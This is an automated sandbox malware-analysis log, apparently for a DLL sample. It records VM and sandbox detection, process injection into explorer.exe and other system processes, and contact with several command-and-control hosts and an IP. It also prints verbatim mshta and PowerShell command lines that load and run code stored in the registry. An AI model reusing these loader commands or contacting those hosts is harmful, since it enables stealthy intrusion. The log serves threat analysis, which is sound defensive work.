                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\MSTRACER.DLLCR
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452 Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080 Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4875
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4102
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4861
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 00000030.00000000.1053923810.000001DA49E59000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ll
                      Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
                      Source: loaddll32.exe, 00000000.00000003.884544314.0000000001342000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USn
                      Source: explorer.exe, 0000001C.00000000.881750747.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                      Source: RuntimeBroker.exe, 00000025.00000000.976191564.0000027D4E762000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
                      Source: explorer.exe, 0000001C.00000000.889230048.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                      Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457CC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04580BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BBCC4A FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BC0BC5 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097198F lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_00980BC5 memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_0097CC4A FindFirstFileW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_045737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_04BB37F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,
                      Source: C:\Windows\SysWOW64\cmd.exe Code function: 49_2_009737F9 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: init.icecreambob.com
                      Source: C:\Windows\explorer.exe Domain query: art.microsoftsofymicrosoftsoft.at
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 194.147.86.221 80
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
                      Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
                      Compiles code for process injection (via .Net compiler)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\System32\control.exe base: 9D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory allocated: C:\Windows\SysWOW64\cmd.exe base: 660000 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 2D2D64A0000 protect: page execute and read and write
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exe Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: BD4F1580
                      Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
                      Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
                      Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
                      Writes to foreign memory regions
                      Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
                      Source: C:\Windows\System32\loaddll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 9D0000
                      Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7880B12E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9FA000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 2B60000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9FC000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 30F0000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 8C7CFF1000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27D4F3D0000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7386885000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B4F85E0000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD217F000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1DA4C230000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 660000
                      Source: C:\Windows\explorer.exe Memory written: C:\Windows\SysWOW64\cmd.exe base: 11E6FC0
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 2D2D64A0000
                      Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF66D755FD0
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exe Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
                      Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9FA000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 2B60000 value: 80
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9FC000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 30F0000 value: 80
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 4868
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
                      Source: C:\Windows\explorer.exe Thread register set: target process: 3656
                      Source: C:\Windows\explorer.exe Thread register set: target process: 4268
                      Source: C:\Windows\explorer.exe Thread register set: target process: 4772
                      Source: C:\Windows\explorer.exe Thread register set: target process: 6752
                      Source: C:\Windows\explorer.exe Thread register set: target process: 5288
                      Source: C:\Windows\explorer.exeThread register set: target process: 1260
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3424
                      Source: C:\Windows\System32\control.exeThread register set: target process: 6508
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
